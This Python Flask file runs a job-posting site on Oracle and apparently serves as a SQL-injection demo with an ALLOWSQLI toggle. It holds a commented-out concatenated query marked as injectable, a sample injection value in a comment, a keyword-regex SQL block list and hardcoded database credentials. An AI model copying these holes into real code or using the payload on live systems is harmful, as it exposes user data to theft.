self.assertEquals(str(res.data.get('non_field_errors')[0]),
'Unable to log in with provided credentials.')
def test_login_successfull(self):
get_user_model().objects.create_user(
email="testuser@bondeveloper.com",
password="Qwert!@#"
)
payload = {
"email": "testuser@bondeveloper.com",
"password": "Qwert!@#"
}
res = self.client.post(self.login_url, payload, format='json')
self.assertEquals(res.status_code, status.HTTP_200_OK)
self.assertIn('access_token', res.data.keys())
self.assertIn('refresh_token', res.data.keys())
self.assertIn('user', res.data.keys())
self.assertEquals(res.data.get('user')['email'], payload.get('email'))
def test_verify_valid_access_token(self):
get_user_model().objects.create_user(
email="testuser@bondeveloper.com",
password="Qwert!@#"
)
payload = {
"email": "testuser@bondeveloper.com",
"password": "Qwert!@#"
}
res = self.client.post(self.login_url, payload, format='json')
self.assertEquals(res.status_code, status.HTTP_200_OK)
self.assertIn('access_token', res.data.keys())
payload = {
"token": str(res.data.get('access_token'))
}
res = self.client.post(self.token_url+'verify/', payload,
format='json')
self.assertEquals(res.status_code, status.HTTP_200_OK)
def test_verify_invalid_access_token(self):
get_user_model().objects.create_user(
email="testuser@bondeveloper.com",
password="Qwert!@#"
)
payload = {
"email": "testuser@bondeveloper.com",
"password": "Qwert!@#"
}
res = self.client.post(self.login_url, payload, format='json')
self.assertEquals(res.status_code, status.HTTP_200_OK)
self.assertIn('access_token', res.data.keys())
payload = {
"token": str(res.data.get('access_token')+"made_invalid_by_str")
}
res = self.client.post(self.token_url+'verify/', payload,
format='json')
self.assertEquals(res.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertIn('detail', res.data.keys())
self.assertIn('code', res.data.keys())
self.assertEquals(res.data.get('detail'),
'Token is invalid or expired')
self.assertEquals(res.data.get('code'), 'token_not_valid')
def test_refresh_using_refresh_token(self):
get_user_model().objects.create_user(
email="testuser@bondeveloper.com",
password="Qwert!@#"
)
payload = {
"email": "testuser@bondeveloper.com",
"password": "Qwert!@#"
}
res = self.client.post(self.login_url, payload, format='json')
self.assertEquals(res.status_code, status.HTTP_200_OK)
self.assertIn('refresh_token', res.data.keys())
payload = {
"refresh": str(res.data.get('refresh_token'))
}
res = self.client.post(self.token_url+'refresh/', payload,
format='json')
self.assertEquals(res.status_code, status.HTTP_200_OK)
self.assertIn('access', res.data.keys())
def test_refresh_using_access_token(self):
get_user_model().objects.create_user(
email="testuser@bondeveloper.com",
password="Qwert!@#"
)
payload = {
"email": "testuser@bondeveloper.com",
"password": "Qwert!@#"
}
res = self.client.post(self.login_url, payload, format='json')
self.assertEquals(res.status_code, status.HTTP_200_OK)
self.assertIn('access_token', res.data.keys())
payload = {
"refresh": str(res.data.get('access_token'))
}
res = self.client.post(self.token_url+'refresh/', payload,
format='json')
self.assertEquals(res.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertIn('detail', res.data.keys())
self.assertIn('code', res.data.keys())
self.assertEquals(res.data.get('detail'), 'Token has wrong type')
self.assertEquals(res.data.get('code'), 'token_not_valid')
| 38.012605
| 79
| 0.570244
| 962
| 9,047
| 5.189189
| 0.122661
| 0.051883
| 0.083734
| 0.089744
| 0.856571
| 0.844551
| 0.842949
| 0.832131
| 0.820913
| 0.771635
| 0
| 0.013252
| 0.291036
| 9,047
| 237
| 80
| 38.172996
| 0.765045
| 0.007295
| 0
| 0.649485
| 0
| 0
| 0.209105
| 0.056166
| 0
| 0
| 0
| 0
| 0.252577
| 1
| 0.06701
| false
| 0.159794
| 0.020619
| 0
| 0.108247
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
016b06590fc443cb25a2955e4faf9f16bc4cad6e
| 680
|
py
|
Python
|
statistical/pdfs.py
|
Jav1d/Generative_Models
|
b7578b5277488ebd212a50d1c22a5c9708f4c311
|
[
"MIT"
] | null | null | null |
statistical/pdfs.py
|
Jav1d/Generative_Models
|
b7578b5277488ebd212a50d1c22a5c9708f4c311
|
[
"MIT"
] | null | null | null |
statistical/pdfs.py
|
Jav1d/Generative_Models
|
b7578b5277488ebd212a50d1c22a5c9708f4c311
|
[
"MIT"
] | null | null | null |
import tensorflow as tf
import tensorflow_probability as tfp
def log_normal_pdf(sample, mean, logvariance):
dist = tfp.distributions.Normal(loc=mean, scale=tf.sqrt(tf.exp(logvariance)))
return tf.identity(dist.log_prob(value=sample), name='logpdf')
def log_Student_df1_pdf(sample, mean, logvariance):
dist = tfp.distributions.StudentT(df=1, loc=mean, scale=tf.sqrt(tf.exp(logvariance)))
return tf.identity(dist.log_prob(value=sample), name='logpdf')
def log_Student_df05_pdf(sample, mean, logvariance):
dist = tfp.distributions.StudentT(df=0.5, loc=mean, scale=tf.sqrt(tf.exp(logvariance)))
return tf.identity(dist.log_prob(value=sample), name='logpdf')
| 48.571429
| 91
| 0.758824
| 103
| 680
| 4.893204
| 0.320388
| 0.035714
| 0.077381
| 0.142857
| 0.84127
| 0.84127
| 0.84127
| 0.753968
| 0.753968
| 0.539683
| 0
| 0.00982
| 0.101471
| 680
| 14
| 92
| 48.571429
| 0.815057
| 0
| 0
| 0.272727
| 0
| 0
| 0.026432
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.272727
| false
| 0
| 0.181818
| 0
| 0.727273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
6d90be0fd8d2a689ea2721d9f34a54995ddfdd04
| 72,982
|
py
|
Python
|
session.py
|
MicroXY/database-hard-demo
|
034ee2cb3044c55bb9df29b443255d624520cb6f
|
[
"MIT"
] | null | null | null |
session.py
|
MicroXY/database-hard-demo
|
034ee2cb3044c55bb9df29b443255d624520cb6f
|
[
"MIT"
] | null | null | null |
session.py
|
MicroXY/database-hard-demo
|
034ee2cb3044c55bb9df29b443255d624520cb6f
|
[
"MIT"
] | null | null | null |
from login_form import LoginForm
from login_form import RegisterForm
from login_form import SecrityForm
from flask_wtf.csrf import CSRFProtect
from werkzeug.security import generate_password_hash
from user import User,send_email
from flask_login import login_user, login_required
from flask_login import LoginManager, current_user
from flask_login import logout_user
from flask_login import fresh_login_required
from flask import Flask
from flask import request
from flask import render_template
from flask import redirect
from flask import url_for
from flask import redirect
from flask import flash,abort
from oracledb import Pool
from oracledb import DataBasePool
import time
import uuid
import os
from datetime import timedelta
from datetime import datetime
import urllib
import re
from flask_mail import Mail
from functools import wraps
ALLOWSQLI=True
# 创建数据库连接池
pool=Pool()
# pool链接数据库
pool.creatpool('webmanager','123456','192.168.71.139/oradb')
# Flask类对象
app = Flask(__name__,static_url_path='')
app.config.update(
MAIL_SERVER = "smtp.qq.com",
MAIL_PORT = "587",
MAIL_USE_TLS = True,
MAIL_USERNAME = "",
MAIL_PASSWORD = "",
MAIL_DEFAULT_SENDER = "吉林大学计算机科学与技术学院",#默认发送者
)
# 密钥
app.secret_key = os.urandom(24)
# 核心类用户设置
# use login manager to manage session
login_managers = LoginManager()
login_managers.session_protection = 'strong'
login_managers.login_view = 'login'
login_managers.login_message = '请先登录'
login_managers.refresh_view = 'login'
login_managers.needs_refresh_message = '你需要重新登录'
login_managers.remember_cookie_duration=timedelta(days=1)
login_managers.remember_cookie_httponly=True
# login_managers.user
login_managers.init_app(app=app)
# 实例化flask_mail
mail = Mail(app)
# 这个callback函数用于reload User object,根据session中存储的user id
import logging # 引入logging模块
import os.path
import time
# 第一步,创建一个logger
logger = logging.getLogger()
logger.setLevel(logging.INFO) # Log等级总开关
# 第二步,创建一个handler,用于写入日志文件
filename = r'C:\Users\MIAO -\Desktop\weboracle2.0\weboracle2.0\weboracle\log.txt'
fh = logging.FileHandler(filename, mode='w')
fh.setLevel(logging.DEBUG) # 输出到file的log等级的开关
# 第三步,定义handler的输出格式
formatter = logging.Formatter("%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s")
fh.setFormatter(formatter)
# 第四步,将logger添加到handler里面
logger.addHandler(fh)
@login_managers.user_loader
def load_user(user_id,is_authenticated=True,is_active=False,is_anonymous=False):
# flash('回调函数')
user = User.get(user_id)
user.is_authenticated=is_authenticated
user.is_active=is_active
user.is_anonymous=is_anonymous
return user
# csrf protection
csrf = CSRFProtect()
csrf.init_app(app)
def is_number(s):
try:
int(s)
return True
except ValueError:
pass
try:
import unicodedata
unicodedata.numeric(s)
return True
except (TypeError, ValueError):
pass
return False
def calculate_age(birth_s):
birth_d = datetime.strptime(birth_s, "%Y/%m/%d")
today_d = datetime.now()
birth_t = birth_d.replace(year=today_d.year)
if today_d > birth_t:
age = today_d.year - birth_d.year
else:
age = today_d.year - birth_d.year - 1
return age
def permission_required(permission):
def decorator(f):
@wraps(f)
def decorated_function(*args,**kwargs):
# print(current_user.can(2))
if not current_user.can(2):
logger.warning('无管理员权限,无法执行此操作')
abort(403)
return f(*args, **kwargs)
return decorated_function
return decorator
def admin_required(f):
return permission_required(2)(f)
'''
@app.before_request
def before_request():
#假设是post请求,data为传入的请求参数
# print(request.url)
if re.search(r"*.html",request.path):
data =request.json
for v in data.values():
v= str(v).lower()
pattern = r"\b(and|like|exec|insert|select|drop|grant|alter|delete|update|count|chr|mid|master|truncate|char|delclare|or)\b|(\*|;)"
r = re.search(pattern,v)
if r:
abort(405)
return redirect(request.url)
'''
@app.route('/login',methods=['GET','POST'])
def login():
if current_user is not None and current_user.is_authenticated:
url= request.args.get('next')
next_url=None
if url!=None:
next_url = urllib.parse.unquote(url)
else:
next_url=None
login_user(load_user(current_user.id))
return redirect( next_url or url_for('index') )
form = LoginForm()
if form.validate_on_submit():
user_name = request.form.get('username', None)
password = request.form.get('password', None)
remember_me = request.form.get('remember_me', False)
pattern = r"\b(and|like|exec|insert|select|drop|grant|alter|delete|update|count|chr|mid|master|truncate|char|delclare|or)\b|(\*|;)"
r = re.search(pattern, str(user_name).lower())
if r:
logger.warning('username一栏检测到非法输入:'+r.group()+'可能为恶意攻击.')
abort(405)
return render_template('login.html', title="登录", form=form)
r = re.search(pattern, str(password).lower())
if r:
logger.warning('password一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('login.html', title="登录", form=form)
user = User(user_name)
if user.verify_password(password):
user.is_authenticated=True
user.is_active=True
login_user(user, remember=remember_me)
url= request.args.get('next')
next_url=None
if url!=None:
next_url = urllib.parse.unquote(url)
else:
next_url=None
return redirect( next_url or url_for('index') )
else:
return render_template('login.html', title="登录", form=form,info='用户名或密码错误!')
return render_template('login.html', title="登录", form=form)
@app.route('/register',methods=['GET','POST'])
def register():
form = RegisterForm()
if form.validate_on_submit():
user_name = request.form.get('username', None)
# print(user_name)
password = request.form.get('password', None)
email = request.form.get('email', None)
creatdata=datetime.now().strftime("%Y-%m-%d")
#print(email)
#print(creatdata)
pattern = r"\b(and|like|exec|insert|select|drop|grant|alter|delete|update|count|chr|mid|master|truncate|char|delclare|or)\b|(\*|;)"
r = re.search(pattern, str(user_name).lower())
if r:
logger.warning('user_name一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('register.html', title="注册", form=form)
r = re.search(pattern, str(password).lower())
if r:
logger.warning('password一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('register.html', title="注册", form=form)
r = re.search(pattern, str(email).lower())
if r:
logger.warning('email一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('register.html', title="注册", form=form)
r = re.search(pattern, str(creatdata).lower())
if r:
logger.warning('creatdata一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('register.html', title="注册", form=form)
user=User.register(user_name,password,email,creatdata)
if user is not None :
user.is_active=True
user.is_authenticated=True
user.is_anonymous=False
login_user(user)
return redirect( request.args.get('next') or url_for('index'))
else:
return render_template('register.html', title="注册", form=form,info='用户名不可用!')
return render_template('register.html', title="注册", form=form)
@app.route('/logout')
@login_required
def logout():
logout_user()
return redirect(url_for('login'))
@app.route('/')
@app.route('/index')
@login_required
def index():
form=SecrityForm()
keys= request.args.get('search')
'''
pattern = r"\b(and|like|exec|insert|select|drop|grant|alter|delete|update|count|chr|mid|master|truncate|char|delclare|or)\b|(\*|;)"
r = re.search(pattern, str(keys).lower())
if r:
logger.warning('keys一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('index.html', title="注册", form=form)
'''
if keys!=None:
try:
db=DataBasePool()
db.connect(pool)
#results = db.select("select company_id,brief_introduce,upload_time,time_of_end,workplace,salary,job_title,sid from weboracle.company_info WHERE brief_introduce like :pattern OR workplace like :pattern OR salary like :pattern OR job_title like :pattern OR to_char(time_of_end,'yyyy-mm-dd') like :pattern OR to_char(upload_time,'yyyy-mm-dd hh24:mi:ss') like :pattern order by upload_time desc",)
ll=[]
d = {}
# #keys='aa%\' OR \'aa\' like \'%a'
# print(keys)
# '''以下方式存在注入漏洞'''
# sql="select company_id,brief_introduce,upload_time,time_of_end,workplace,salary,job_title,sid from weboracle.company_info WHERE brief_introduce like '%"+keys+"%' OR workplace like '%"+keys+"%' OR salary like '%"+keys+"%' OR job_title like '%"+keys+"%' OR to_char(time_of_end,'yyyy-mm-dd') like '%"+keys+"%' OR to_char(upload_time,'yyyy-mm-dd hh24:mi:ss') like '%"+keys+"%' order by upload_time desc"
# print(sql)
# results=db.select(sql,None)
# '''以下方式不存在漏洞'''
d["pattern"] = '%' + keys + '%'
print(d)
results=db.select("select company_id,brief_introduce,upload_time,time_of_end,workplace,salary,job_title,sid from weboracle.company_info WHERE brief_introduce like :pattern OR workplace like :pattern OR salary like :pattern OR job_title like :pattern OR to_char(time_of_end,'yyyy-mm-dd') like :pattern OR to_char(upload_time,'yyyy-mm-dd hh24:mi:ss') like :pattern order by upload_time desc",d,ALLOWSQLI=ALLOWSQLI)
# print(results)
for item in results[1]:
dic={}
dic["company_id"]=item[0]
dic["brief_introduce"]=item[1]
dic["upload_time"]=item[2]
dic["time_of_end"]=item[3]
dic["workplace"]=item[4]
dic["salary"]=item[5]
dic["job_title"]=item[6]
dic["sid"]=item[7]
ll.append(dic)
return render_template('index.html',flags=ALLOWSQLI,form=form,index_result=ll,username=current_user.username)
except:
return render_template('index.html',flags=ALLOWSQLI,form=form,error='服务器发生错误!!!',username=current_user.username)
finally:
db.close()
return render_template('index.html',flags=ALLOWSQLI,form=form,error='未查询到数据,请刷新重试!',username=current_user.username)
else:
try:
db=DataBasePool()
db.connect(pool)
ll=[]
results=db.select("select company_id,brief_introduce,upload_time,time_of_end,workplace,salary,job_title,sid from weboracle.company_info order by upload_time desc",ALLOWSQLI=ALLOWSQLI)
for item in results[1]:
dic={}
dic["company_id"]=item[0]
dic["brief_introduce"]=item[1]
dic["upload_time"]=item[2]
dic["time_of_end"]=item[3]
dic["workplace"]=item[4]
dic["salary"]=item[5]
dic["job_title"]=item[6]
dic["sid"]=item[7]
ll.append(dic)
return render_template('index.html',flags=ALLOWSQLI,form=form,index_result=ll,username=current_user.username)
except:
return render_template('index.html',flags=ALLOWSQLI,form=form,error='服务器发生错误!!!',username=current_user.username)
finally:
db.close()
return render_template('index.html',flags=ALLOWSQLI,form=form,error='未查询到数据,请刷新重试!',username=current_user.username)
# @login_required
# @app.route('/')
@app.route('/reset_password',methods=['GET','POST'])
def reset_password_request():
if not current_user.is_anonymous:
#验证密码是否为登录状态,如果是,则终止重置密码
return redirect(url_for('index'))
form=SecrityForm()
if form.validate_on_submit():
email = request.form.get('email', None)
pattern = r"\b(and|like|exec|insert|select|drop|grant|alter|delete|update|count|chr|mid|master|truncate|char|delclare|or)\b|(\*|;)"
r = re.search(pattern, str(email).lower())
if r:
logger.warning('email一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('reset_password.html', form=form)
user = User.get_email(email)
if user:
#如果用户存在
token = user.get_jwt_token()
#调用User模块中的generate_reset_token函数生成验证信息
send_email(email,'重置密码','mail',token=token,username=user.username)
#调用send_email函数,渲染邮件内容之后发送重置密码邮件
return render_template('reset_password.html',form=form,info="重置密码邮件已发送,请注意查收")
return render_template('reset_password.html',form=form)
@app.route('/reset_password/<token>',methods=['GET','POST'])
def reset_password(token):
if not current_user.is_anonymous:
return redirect(url_for('index'))
form=SecrityForm()
if form.validate_on_submit():
password=request.form.get('password', None)
tokens=request.form.get('token', None)
pattern = r"\b(and|like|exec|insert|select|drop|grant|alter|delete|update|count|chr|mid|master|truncate|char|delclare|or)\b|(\*|;)"
r = re.search(pattern, str(password).lower())
if r:
logger.warning('password一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('password_reset.html', form=form,token=token)
r = re.search(pattern, str(tokens).lower())
if r:
logger.warning('tokens一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('password_reset.html', form=form, token=token)
if User.verify_jwt_token(bytes(tokens.encode('utf-8')))[0]==True:
user = User.get(User.verify_jwt_token(bytes( tokens.encode('utf-8') ))[1])
if user is None:
return render_template('password_reset.html',form=form,token=token,info="密码重置失败,用户不存在")
user.password=password
return redirect(url_for('login'))
# else:
# return render_template('password_reset.html',form=form,token=token,info="密码重置失败")
return render_template('password_reset.html',form=form,token=token,info="你是不是来盗号的?????")
return render_template('password_reset.html',form=form,token=token)
@app.route('/job_wanted')
@login_required
def job_wanted():
form=SecrityForm()
keys= request.args.get('search')
pattern = r"\b(and|like|exec|insert|select|drop|grant|alter|delete|update|count|chr|mid|master|truncate|char|delclare|or)\b|(\*|;)"
r = re.search(pattern, str(keys).lower())
if r:
logger.warning('keys一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('job_wanted.html',flags=ALLOWSQLI,form=form,username=current_user.username)
if keys!=None:
try:
db=DataBasePool()
db.connect(pool)
d={}
d["pattern"]='%'+keys+'%'
ll=[]
results=db.select("select stu_id,name,sex,to_char(birth_time,'yyyy/mm/dd'),education_background,school_of_graduation,job_wanted,salary,job_time,to_char(time_of_graduation,'yyyy-mm-dd') from weboracle.student_info WHERE name like :pattern OR sex like :pattern OR education_background like :pattern OR school_of_graduation like :pattern OR to_char(birth_time,'yyyy-mm-dd') like :pattern OR job_wanted like :pattern OR salary like :pattern OR job_time like :pattern OR to_char(time_of_graduation,'yyyy-mm-dd') like :pattern order by salary desc",d,ALLOWSQLI=ALLOWSQLI)
for item in results[1]:
dic={}
dic["stu_id"]=item[0]
dic["name"]=item[1]
if str(item[2])=="man " or str(item[2])=="男 ":
dic["sex"]='男'
else:
dic["sex"]='女'
dic["birth_time"]=str(calculate_age(item[3]))+'岁'
dic["education_background"]=item[4]
dic["school_of_graduation"]=item[5]
dic["job_wanted"]=item[6]
dic["salary"]=item[7]
dic["job_time"]=item[8]
dic["time_of_graduation"]=item[9]
ll.append(dic)
return render_template('job_wanted.html',flags=ALLOWSQLI,form=form,job_result=ll,username=current_user.username)
except:
return render_template('job_wanted.html',flags=ALLOWSQLI,form=form,error='服务器发生错误!!!',username=current_user.username)
finally:
db.close()
return render_template('job_wanted.html',flags=ALLOWSQLI,form=form,error='未查询到数据,请刷新重试!',username=current_user.username)
else:
try:
db=DataBasePool()
db.connect(pool)
ll=[]
results=db.select("select stu_id,name,sex,to_char(birth_time,'yyyy/mm/dd'),education_background,school_of_graduation,job_wanted,salary,job_time,to_char(time_of_graduation,'yyyy-mm-dd') from weboracle.student_info order by salary desc",ALLOWSQLI=ALLOWSQLI)
for item in results[1]:
dic={}
dic["stu_id"]=item[0]
dic["name"]=item[1]
if str(item[2])=="man " or str(item[2])=="男 ":
dic["sex"]='男'
else:
dic["sex"]='女'
dic["birth_time"]=str(calculate_age(item[3]))+'岁'
dic["education_background"]=item[4]
dic["school_of_graduation"]=item[5]
dic["job_wanted"]=item[6]
dic["salary"]=item[7]
dic["job_time"]=item[8]
dic["time_of_graduation"]=item[9]
ll.append(dic)
return render_template('job_wanted.html',flags=ALLOWSQLI,form=form,job_result=ll,username=current_user.username)
except:
return render_template('job_wanted.html',flags=ALLOWSQLI,form=form,error='服务器发生错误!!!',username=current_user.username)
finally:
db.close()
return render_template('job_wanted.html',flags=ALLOWSQLI,form=form,error='未查询到数据,请刷新重试!',username=current_user.username)
# @app.route('/')
@app.route('/info_modification',methods=['GET','POST'])
@login_required
def info_modification():
form = SecrityForm()
if form.validate_on_submit():
db=DataBasePool()
db.connect(pool)
try:
store_id=str(uuid.uuid4()).replace('-','')
name = request.form.get('val-name', None)
sex = request.form.get('val-sex', None)
birth_time = request.form.get('birth_time', None)
education_background = request.form.get('val-education_background', None)
time_of_graduation = request.form.get('time_of_graduation', None)
school_of_graduation = request.form.get('val-school_of_graduation', None)
major = request.form.get('val-major', None)
phone_number = request.form.get('val-phone_number', None)
job_wanted = request.form.get('val-job_wanted', None)
job_time = request.form.get('val-job_time', None)
salary = request.form.get('val-salary', None)
suggestions = request.form.get('val-suggestions', None)
pattern = r"\b(and|like|exec|insert|select|drop|grant|alter|delete|update|count|chr|mid|master|truncate|char|delclare|or)\b|(\*|;)"
r = re.search(pattern, str(name).lower())
if r:
logger.warning('name一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('info_modification.html',flags=ALLOWSQLI, form=form,username=current_user.username)
r = re.search(pattern, str(sex).lower())
if r:
logger.warning('sex一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('info_modification.html',flags=ALLOWSQLI, form=form, username=current_user.username)
r = re.search(pattern, str(birth_time).lower())
if r:
logger.warning('birth_time一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('info_modification.html',flags=ALLOWSQLI, form=form, username=current_user.username)
r = re.search(pattern, str(education_background).lower())
if r:
logger.warning('education_background一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('info_modification.html',flags=ALLOWSQLI, form=form, username=current_user.username)
r = re.search(pattern, str(time_of_graduation).lower())
if r:
logger.warning('time_of_graduation一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('info_modification.html',flags=ALLOWSQLI, form=form, username=current_user.username)
r = re.search(pattern, str(school_of_graduation).lower())
if r:
logger.warning('school_of_graduation一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('info_modification.html',flags=ALLOWSQLI, form=form, username=current_user.username)
r = re.search(pattern, str(major).lower())
if r:
logger.warning('major一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('info_modification.html',flags=ALLOWSQLI, form=form, username=current_user.username)
r = re.search(pattern, str(phone_number).lower())
if r:
logger.warning('phone_number一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('info_modification.html',flags=ALLOWSQLI, form=form, username=current_user.username)
r = re.search(pattern, str(job_wanted).lower())
if r:
logger.warning('job_wanted一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('info_modification.html',flags=ALLOWSQLI, form=form, username=current_user.username)
r = re.search(pattern, str(job_time).lower())
if r:
logger.warning('job_time一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('info_modification.html',flags=ALLOWSQLI, form=form, username=current_user.username)
r = re.search(pattern, str(salary).lower())
if r:
logger.warning('salary一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('info_modification.html',flags=ALLOWSQLI, form=form, username=current_user.username)
r = re.search(pattern, str(suggestions).lower())
if r:
logger.warning('suggestions一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('info_modification.html',flags=ALLOWSQLI, form=form, username=current_user.username)
dic={}
dic["stu_id"]=store_id
dic["name"]=name
dic["sex"]=sex
dic["birth_time"]=birth_time
dic["education_background"]=education_background
dic["school_of_graduation"]=school_of_graduation
dic["time_of_graduation"]=time_of_graduation
dic["major"]=major
dic["resume"]=suggestions
dic["phone_number"]=phone_number
dic["job_time"]=job_time
dic["job_wanted"]=job_wanted
dic["salary"]=salary
dic["sid"]=current_user.id
for value in dic.values():
# print(value)
if value=='':
return render_template('info_modification.html',flags=ALLOWSQLI,form=form,error='所有表格都为必填项,请重新填写!',username=current_user.username)
if is_number(phone_number)==False:
return render_template('info_modification.html',flags=ALLOWSQLI,form=form,error='电话号码格式错误,请重新填写!',username=current_user.username)
db.modify("insert into weboracle.student_info (stu_id,name,sex,birth_time,education_background,time_of_graduation,school_of_graduation,major,resume,phone_number,job_time,job_wanted,salary,sid) values (:stu_id,:name,:sex,to_date(:birth_time,'yyyy-mm-dd'),:education_background,to_date(:time_of_graduation,'yyyy-mm-dd'),:school_of_graduation,:major,:resume,:phone_number,:job_time,:job_wanted,:salary,:sid)",dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
except:
db.rollback()
return render_template('info_modification.html',flags=ALLOWSQLI,form=form,error='服务器发生错误,请重试!',username=current_user.username)
finally:
db.close()
return render_template('info_modification.html',flags=ALLOWSQLI, form=form,info='发布成功!',username=current_user.username)
return render_template('info_modification.html',flags=ALLOWSQLI, form=form,username=current_user.username)
# @app.route('/')
@app.route('/manager_info',methods=['GET','POST'])
@login_required
@admin_required
def manager_info():
form=SecrityForm()
db=DataBasePool()
db.connect(pool)
if form.validate_on_submit():
if request.form.get('delete',None)!=None:
dic = {}
type_pk = request.form.get('pk', None)
dic['stu_id'] = type_pk
db.modify("delete from weboracle.student_info where stu_id=:stu_id", dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
ll = []
results = db.select(
"select stu_id,name,sex,to_char(birth_time,'yyyy/mm/dd'),education_background,school_of_graduation,to_char(time_of_graduation,'yyyy-mm-dd'),major,resume,phone_number,job_time,job_wanted,salary from weboracle.student_info ",ALLOWSQLI=ALLOWSQLI)
for item in results[1]:
dic = {}
dic["stu_id"] = item[0]
dic["name"] = item[1]
if str(item[2]) == "man " or str(item[2]) == "男 ":
dic["sex"] = '男'
else:
dic["sex"] = '女'
dic["birth_time"] = item[3]
dic["education_background"] = item[4]
dic["school_of_graduation"] = item[5]
dic["time_of_graduation"] = item[6]
dic["major"] = item[7]
dic["resume"] = item[8]
dic["phone_number"] = item[9]
dic["job_time"] = item[10]
dic["job_wanted"] = item[11]
dic["salary"] = item[12]
ll.append(dic)
return render_template('manager_info.html',flags=ALLOWSQLI, form=form, URL='/modify_self_info', manager_info_result=ll,
error='删除成功!',username=current_user.username)
return render_template('manager_info.html',flags=ALLOWSQLI,form=form,URL='/modify_self_info',username=current_user.username)
else:
try:
ll=[]
results=db.select("select stu_id,name,sex,to_char(birth_time,'yyyy/mm/dd'),education_background,school_of_graduation,to_char(time_of_graduation,'yyyy-mm-dd'),major,resume,phone_number,job_time,job_wanted,salary from weboracle.student_info ",ALLOWSQLI=ALLOWSQLI)
for item in results[1]:
dic={}
dic["stu_id"]=item[0]
dic["name"]=item[1]
if str(item[2])=="man " or str(item[2])=="男 ":
dic["sex"]='男'
else:
dic["sex"]='女'
dic["birth_time"]=item[3]
dic["education_background"]=item[4]
dic["school_of_graduation"]=item[5]
dic["time_of_graduation"]=item[6]
dic["major"]=item[7]
dic["resume"]=item[8]
dic["phone_number"]=item[9]
dic["job_time"]=item[10]
dic["job_wanted"]=item[11]
dic["salary"]=item[12]
ll.append(dic)
return render_template('manager_info.html',flags=ALLOWSQLI,form=form,URL='/modify_self_info',manager_info_result=ll,username=current_user.username)
except:
return render_template('manager_info.html',flags=ALLOWSQLI,form=form,URL='/modify_self_info',error='服务器发生错误!!!',username=current_user.username)
finally:
db.close()
return render_template('manager_info.html',flags=ALLOWSQLI,form=form,URL='/modify_self_info',error='未查询到数据,请刷新重试!',username=current_user.username)
@app.route('/manager_user',methods=['GET','POST'])
@login_required
@admin_required
def manager_user():
form=SecrityForm()
db = DataBasePool()
db.connect(pool)
if form.validate_on_submit():
if request.form.get('delete',None)!=None:
dic = {}
type_pk = request.form.get('pk', None)
dic['sid'] = type_pk
results = db.select("select user_type from weboracle.users where sid=:sid", dic)
if len(results[1])!=0:
if int(results[1][0][0])!=1:
# print(type(results[1][0][0]))
logger.warning('无权限删除管理员信息')
abort(403)
return render_template('manager_user.html',flags=ALLOWSQLI, form=form, URL='/manager_user',username=current_user.username)
db.modify("delete from weboracle.users where sid=:sid", dic)
db.modify("delete from weboracle.student_info where sid=:sid", dic)
db.modify("delete from weboracle.company_info where sid=:sid", dic)
db.commit()
ll = []
results = db.select(
"select sid,username,user_type,E_mail,login_num,last_login_time from weboracle.users order by last_login_time desc")
for item in results[1]:
dic = {}
dic["sid"] = item[0]
dic["username"] = item[1]
dic["user_type"] = item[2]
dic["Email"] = item[3]
dic["login_num"] = item[4]
dic["last_login_time"] = item[5]
ll.append(dic)
return render_template('manager_user.html',flags=ALLOWSQLI, form=form, URL='/manager_user', manager_user_result=ll,
error='删除成功',username=current_user.username)
else:
ll = []
results = db.select(
"select sid,username,user_type,E_mail,login_num,last_login_time from weboracle.users order by last_login_time desc")
for item in results[1]:
dic = {}
dic["sid"] = item[0]
dic["username"] = item[1]
dic["user_type"] = item[2]
dic["Email"] = item[3]
dic["login_num"] = item[4]
dic["last_login_time"] = item[5]
ll.append(dic)
return render_template('manager_user.html',flags=ALLOWSQLI, form=form, URL='/manager_user', manager_user_result=ll,
error='删除成功', username=current_user.username)
type_name = request.form.get('name', None)
type_value = request.form.get('value', None)
type_pk = request.form.get('pk', None)
